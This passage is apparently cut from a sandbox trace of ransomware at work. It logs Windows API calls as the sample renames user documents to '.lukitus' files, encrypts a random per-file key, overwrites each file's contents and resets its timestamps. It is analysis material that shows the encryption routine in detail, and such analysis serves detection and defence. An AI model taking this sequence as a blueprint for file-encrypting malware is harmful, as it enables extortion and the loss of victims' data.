out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.926] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.926] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.926] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.926] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.926] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\RaGQtsBU4.odt" (normalized: "c:\\users\\aetadzjz\\documents\\ragqtsbu4.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.926] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\RaGQtsBU4.odt" (normalized: "c:\\users\\aetadzjz\\documents\\ragqtsbu4.odt"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-7B55CF77-61F436AD3E42.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-7b55cf77-61f436ad3e42.lukitus"), dwFlags=0x9) returned 1 [0106.927] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.927] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.934] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x11ab1, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x11ab1, lpOverlapped=0x0) returned 1 [0106.934] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.934] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x11ab1, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x11ab1, lpOverlapped=0x0) returned 1 [0106.935] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.935] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63c422f0, dwHighDateTime=0x1d31760)) [0106.935] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.935] FlushFileBuffers (hFile=0x324) returned 1 [0106.938] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\Ys7hE_EPaSvOAKC.xlsx" (normalized: "c:\\users\\aetadzjz\\desktop\\ys7he_epasvoakc.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x660a5d0, ftCreationTime.dwHighDateTime=0x1d300ee, ftLastAccessTime.dwLowDateTime=0x70678a30, ftLastAccessTime.dwHighDateTime=0x1d30615, ftLastWriteTime.dwLowDateTime=0x70678a30, ftLastWriteTime.dwHighDateTime=0x1d30615, nFileSizeHigh=0x0, nFileSizeLow=0x16a45)) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.939] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\Ys7hE_EPaSvOAKC.xlsx" (normalized: "c:\\users\\aetadzjz\\desktop\\ys7he_epasvoakc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.939] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\Ys7hE_EPaSvOAKC.xlsx" (normalized: "c:\\users\\aetadzjz\\desktop\\ys7he_epasvoakc.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-A771A452-48DD4BA9679E.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-a771a452-48dd4ba9679e.lukitus"), dwFlags=0x9) returned 1 [0106.941] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.941] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.947] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x16a45, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x16a45, lpOverlapped=0x0) returned 1 [0106.947] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.947] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x16a45, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x16a45, lpOverlapped=0x0) returned 1 [0106.948] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63c422f0, dwHighDateTime=0x1d31760)) [0106.948] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.948] FlushFileBuffers (hFile=0x324) returned 1 [0106.951] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\RCuamB3hI8kb2INA.ods" (normalized: "c:\\users\\aetadzjz\\documents\\rcuamb3hi8kb2ina.ods"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f38670, ftCreationTime.dwHighDateTime=0x1d3032f, ftLastAccessTime.dwLowDateTime=0x5e0f2e0, ftLastAccessTime.dwHighDateTime=0x1d2f9b9, ftLastWriteTime.dwLowDateTime=0x5e0f2e0, ftLastWriteTime.dwHighDateTime=0x1d2f9b9, nFileSizeHigh=0x0, nFileSizeLow=0x188e7)) returned 1 [0106.951] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.951] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.951] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.951] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.951] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.951] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.951] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.952] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\RCuamB3hI8kb2INA.ods" (normalized: "c:\\users\\aetadzjz\\documents\\rcuamb3hi8kb2ina.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.952] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\RCuamB3hI8kb2INA.ods" (normalized: "c:\\users\\aetadzjz\\documents\\rcuamb3hi8kb2ina.ods"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-B282F5D6-2A6D69715153.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-b282f5d6-2a6d69715153.lukitus"), dwFlags=0x9) returned 1 [0106.954] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.954] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.961] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x188e7, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x188e7, lpOverlapped=0x0) returned 1 [0106.961] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.961] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x188e7, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x188e7, lpOverlapped=0x0) returned 1 [0106.962] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63c68450, dwHighDateTime=0x1d31760)) [0106.962] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.963] FlushFileBuffers (hFile=0x324) returned 1 [0106.968] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\rXZZKm4g6OK9.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\rxzzkm4g6ok9.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4a88a0, ftCreationTime.dwHighDateTime=0x1d3093f, ftLastAccessTime.dwLowDateTime=0x9ec0e320, ftLastAccessTime.dwHighDateTime=0x1d2c620, ftLastWriteTime.dwLowDateTime=0x9ec0e320, ftLastWriteTime.dwHighDateTime=0x1d2c620, nFileSizeHigh=0x0, nFileSizeLow=0x6438)) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.968] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\rXZZKm4g6OK9.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\rxzzkm4g6ok9.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.968] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\rXZZKm4g6OK9.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\rxzzkm4g6ok9.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-3A6DB1CA-755757C28FE3.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-3a6db1ca-755757c28fe3.lukitus"), dwFlags=0x9) returned 1 [0106.970] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.970] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.975] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x6438, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x6438, lpOverlapped=0x0) returned 1 [0106.976] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.976] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x6438, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x6438, lpOverlapped=0x0) returned 1 [0106.976] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63c8e5b0, dwHighDateTime=0x1d31760)) [0106.976] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.977] FlushFileBuffers (hFile=0x324) returned 1 [0106.980] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Te2yCCyBh24.odp" (normalized: "c:\\users\\aetadzjz\\documents\\te2yccybh24.odp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb22e0, ftCreationTime.dwHighDateTime=0x1d30090, ftLastAccessTime.dwLowDateTime=0xf197fbc0, ftLastAccessTime.dwHighDateTime=0x1d3060c, ftLastWriteTime.dwLowDateTime=0xf197fbc0, ftLastWriteTime.dwHighDateTime=0x1d3060c, nFileSizeHigh=0x0, nFileSizeLow=0x14ab7)) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.980] CreateFileW 